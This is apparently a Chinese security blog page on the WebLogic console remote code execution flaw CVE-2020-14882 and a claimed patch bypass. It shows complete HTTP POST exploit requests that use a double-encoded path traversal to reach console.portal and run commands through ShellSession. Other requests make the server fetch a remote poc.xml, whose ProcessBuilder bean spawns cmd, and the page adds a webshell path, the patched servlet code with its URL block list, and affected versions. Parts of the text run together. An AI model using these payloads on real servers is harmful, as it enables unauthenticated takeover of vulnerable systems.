目录导航
private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};>>> "%252E%252E%252F".lower()
'%252e%252e%252f'%252E%252E%252F 至 %252e%252e%252f
/console/images/%252e%252e%252fconsole.portal
来自https://twitter.com/chybeta/status/1322131143034957826/photo/2
cmd命令
cmd.exe /c chcp 65001&&whoami&&ipconfigShell会话
coherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSessionpayload
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");Getshell
ROOT_PATH= C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\
Shell_path= ../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp演示视频[代码可复制]
FileSystemXmlApplicationContext
com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContextPOST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")poc.xml
python -m SimpleHTTPServer
python -m pyftpdlib
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
<value>/c</value>
<value><![CDATA[calc]]></value>
</list>
</constructor-arg>
</bean>
</beans>ClassPathXmlApplicationContext
com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContextPOST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.28.128:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://172.16.242.1:8989/poc.xml")CVE-2020–14882路径
没有路径
C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\WEB-INF\lib\console.jarcom.bea.console.utils.MBeanUtilsInitSingleFileServlet
package com.bea.console.utils;
import com.bea.netuix.servlets.manager.SingleFileServlet;
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
public class MBeanUtilsInitSingleFileServlet extends SingleFileServlet {
private static final Log LOG = LogFactory.getLog(MBeanUtilsInitSingleFileServlet.class);
private static final String WL_DISPATCH_POLICY = "wl-dispatch-policy";
private static boolean hasInited = false;
private static final long serialVersionUID = 1L;
public static void initMBean() {
MBeanUtilsInitializer.initMBeanAsynchronously();
}
public void init(ServletConfig config) throws ServletException {
ConsoleWorkManagerUtils.init(config.getInitParameter("wl-dispatch-policy"));
super.init(config);
}
public void service(ServletRequest req, ServletResponse resp) throws ServletException, IOException {
if (!hasInited) {
initMBean();
hasInited = true;
}
if (req instanceof HttpServletRequest) {
HttpServletRequest httpServletRequest = (HttpServletRequest)req;
String url = httpServletRequest.getRequestURI();
if (url.indexOf(";") > 0) {
if (resp instanceof HttpServletResponse) {
HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
httpServletResponse.sendError(404);
}
return;
}
}
try {
super.service(req, resp);
} catch (IllegalStateException e) {
if (LOG.isDebugEnabled())
LOG.debug(e);
}
}
}private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"}; 列表
%252E%252E
%2E%2E
..
%3E
%3C
;
<
>
CVE-2020-14882补丁绕过通知
[漏洞警告]WebLogic控制台远程执行漏洞(CVE-2020-14882)补丁绕过0day
受影响版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0参考链接
medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882